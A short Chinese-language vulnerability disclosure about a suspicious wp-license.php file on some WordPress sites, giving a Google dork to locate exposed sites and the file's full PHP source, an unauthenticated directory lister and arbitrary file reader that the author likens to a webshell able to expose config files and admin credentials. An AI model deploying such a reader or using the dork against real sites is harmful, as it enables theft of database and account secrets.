问题出在wp-license.php,不过官方应该是没有发行这个文件的,google搜索结果中某些网站是最新的版本同样存在此文件。
Google Dork:
inurl:wp-license.php
wp-license.php:
<?php
$root = __DIR__;
$style1='color:#000;';
$style2='color:#00a;font-weight:bold;';
function updir($ADir){
$ADir = substr($ADir, 0, strlen($ADir)-1);
$ADir = substr($ADir, 0, strrpos($ADir, '/'));
return $ADir;
}
if ((isset($_GET['file']))) {
if (is_file($_GET['file'])) {
header("Content-type: text/plain");
readfile($_GET['file']);
return;
}
$path = $_GET['file'].'/';
} else $path = $root.'/';
echo($root.'<br>');
echo($path.'<hr>');
echo '<a href="?file='.updir($path).'">..</a><br />';
$p = $path.'*';
foreach (glob($p) as $file) {
echo '<a style="'.(is_file($file)?$style1:$style2).'" href="?file='.$file.'">'.basename($file).'</a><br />';
}
echo('<hr>');
这个文件就像一个简易的webshell,直接访问就能列目录,虽然只能读取不能写入,不过可以直接读取配置文件加后台账号,危害不小。